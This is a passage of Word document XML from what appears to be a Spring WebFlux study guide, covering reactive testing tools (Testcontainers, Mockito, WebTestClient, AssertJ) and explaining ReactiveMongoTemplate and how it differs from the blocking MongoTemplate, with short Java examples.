    <w:p w14:paraId="10BC977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C9184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158F491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4F49DE6" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275A5B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5075C46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0FD4B89" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20479A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6035CB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7A07BC1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15C82E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACC4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DFA96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73253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Testcontainers (For Integration Testing with Databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79679BF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containers is a popular library for testing with Docker containers. It’s commonly used to test database connections by spinning up containers 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di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ostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D890D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D39E7E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creating Docker containers for databases and other services in tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182EB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s you have an isolated environment for integration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BB26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for testing real database interactions without needing to set up a local database instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08475FE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535E68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containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9E2E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ItemRepositoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2CB44" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9CBE0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er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2731FF1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goDBContainer mongoDBContainer = new MongoDBContainer("mongo:4.0.10");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413B6D9" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435A841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28A37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0B7A5F1A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709F0F0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110AB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RepositoryMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795AC5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real MongoDB instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64013F7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EC01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FB081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Mockito for Mocking Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71623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can be used to mock the service or repository layer when testing controllers or services. It allows you to define how mocked services should behave when invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2DE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03A3707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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F786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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425BC198" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551EAF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53D905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75D730F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5B7E925A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C1751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 or service method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4D60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82D37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ntegration Tests (Using @SpringBootTest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7FDD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3D88C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s the full Spring context, including the web layer, service layer, and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25876FF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ful for end-to-end testing where real interactions with the application are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE749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with real data and external services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B07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BFA9D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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E331B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ConfigureWebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6EB1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IntegrationTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A56810" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6195E2B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27431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5345EDE6" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC465E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5585FE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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072D5B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07E6B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2CEB540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B02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B0F72D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AB58B4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61AE0A1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CC553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FF0E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or Debugging Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096953F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or provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>debugging tool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reactor.core.publisher.Flux#lo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log()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for logging the behavior of reactive streams. These can be helpful during development and testing to track the flow of data and diagnose issues in reactive pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7DFBD"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6DF0C7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just("test")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECCFB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og() // Logs the lifecycle of the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8C3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Next(data -&gt; System.out.println("Received: " + data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A28A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CDD8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Custom Assertions with assertThat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA9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more flexible assertions, you can use libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AssertJ</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Hamcrest</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can assert that a Mono or Flux emits the expected values, or you can combine it with StepVerifier for more complex checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C76375"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13F72E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A278A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Flux() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FAB7A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Flux = itemService.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22658F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ssertThat(itemFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D88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hasSize(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA84A7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tracting(Item::getName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CA06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s("Item 1", "Item 2", "Item 3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2509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3B25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rategies for Testing Reactive Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040ED5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Asynchronous Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that asynchronous behavior doesn't block or freeze the tests. Use StepVerifier to handle assertions on Mono or Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827C72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Test how reactive streams react to errors (e.g., onErrorReturn, onErrorResume). Verify that the correct error handling mechanism is triggered in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911032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ing External Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @MockBean for mocking external service calls to isolate the web layer from the actual service logic during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3E2E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Endpoints with WebTestClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that your endpoints behave correctly in terms of status codes, headers, and bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13FCD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Test how backpressure is managed in your reactive streams and how the system handles situations where consumers cannot keep up with producers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8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Testing with Real Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use integration tests to test your application end-to-end, including database and external API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD538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leveraging these tools and strategies, you can ensure that your reactive endpoints in Spring WebFlux are well-tested, performant, and robust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A48C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333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACED6B" w14:textId="1432DE2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3" w:name="_Toc197867757"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of ReactiveMongoTemplate in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p w14:paraId="2CBD6E50" w14:textId="51F5B6D1" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253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lternative to the traditional MongoTemplate in Spring Data MongoDB. It is used for interacting with MongoDB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manner. This is particularly useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you want to take advantage of the reactive programming model provided by Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DABB4"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ReactiveMongoTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF124E2"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Database Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020BBC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provide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database operations, which helps in handling a large number of concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CFCA2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Reactive Types (Mono, Flux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1164E1E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like Mono and Flux, which are key components of reactive programming in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663A81F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Represents a single value or empty value (a completion signal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D993CB8"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 Represents a sequence of 0 to N values, providing support for handling streams of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB441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UD Operations (Create, Read, Update, Delete):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F4FA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the usual CRUD operations reactively using ReactiveMongoTemplate. These operations will not block the thread and will work efficiently in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B100087"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3FF117E1"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d(): Retrieves documents from the MongoDB collection reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DEE9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ave(): Inserts or updates documents in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402757F2"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move(): Deletes documents from the collection reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065BC2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Aggregation Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EEEFF8"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lso supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB aggregation operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing complex queries to be executed reactively. This includes operations like filtering, grouping, sorting, etc., but in a non-blocking fashion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78B67C"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ustom Query Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FDB87E"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executing </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom queries</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Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects. You can create complex queries with criteria, sorting, pagination, etc., in a reactive manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BA6F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MongoRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D605E6A"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MongoTemplate can be used in combination with ReactiveMongoRepository to customize certain operations or queries when the repository methods do not cover your requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512F3CD"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custom database operations using ReactiveMongoTemplate inside your service layer while still using ReactiveMongoRepository for simple CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732003DE"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E415A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how you might use ReactiveMongoTemplate in a service class for basic CRUD operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C340E88"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41E371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ReactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66347CB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Criteria;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A07E8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Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621B31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5DF60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8039FB" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633D317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DA08A6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2EABD9A" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1278A68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999138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ReactiveMongoTemplate reactiveMongoTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F32BB" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509A001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ave a document in MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02F34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saveItem(Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C0B7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save(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8FB24F"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CB86CD2" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A33925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Find a document by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781526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743ABA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3A1D55A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One(query, Item.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C9B2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B89D234" w14:textId="77777777" w:rsidR="00F7253D" w:rsidRPr="00B13F85" w:rsidRDefault="00F7253D" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215212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document by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495B0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Item(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A468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028FA1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remove(query, Item.class).then();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2DAF0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A11F6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A3F6EB0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E864AD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ll MongoDB operations are non-blocking and work seamlessly in reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F17F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for High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> As it uses asynchronous operations, it is highly efficient for applications with high throughput and concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFA5E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or:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It integrates well with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and supports reactive streams (Mono and Flux), which is the foundation of Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED9D855" w14:textId="2199C2F3" w:rsidR="00163F3B"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334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED0985" w14:textId="4BD0E92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4" w:name="_Toc197867758"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How does it differ from MongoTemplate in traditional Spring applications</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="544"/>
    </w:p>
    <w:p w14:paraId="650A8E1A" w14:textId="5A45CC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differs from </w:t>
      </w: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n traditional (non-reactive) Spring applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA641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rogramming Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE59B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D23898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ngoTemplate is part of the traditional,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xml:space="preserve">. All database operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous and blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning the thread is blocked until the operation completes. For example, if a database query is being executed, the thread waits until the result is fetched before moving to the next task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760030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0960A9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ReactiveMongoTemplate is designed for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in Spring WebFlux. It performs database operations asynchronously and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Flux). This allows the application to process other tasks while waiting for the database operation to complete, making it ideal for high-concurrency, scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C3B6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Return Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EBF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46553B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immediate values, such as List&lt;T&gt;, T, etc., which block the thread until the database operation is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5AD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0AB03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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB00D4D"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Represents 0 or 1 result (single value or empty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFAF120"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T&gt;: Represents 0 to N results (a stream of results).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650154A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se types are used to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous data flows</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The actual result will be obtained when the publisher (i.e., the stream) is subscribed to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F18960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Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F855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8EA766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in a traditional, synchronous fashion where the thread is blocked until the operation finishes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE132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DC0C98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orks in an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manner. It uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactor-based concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
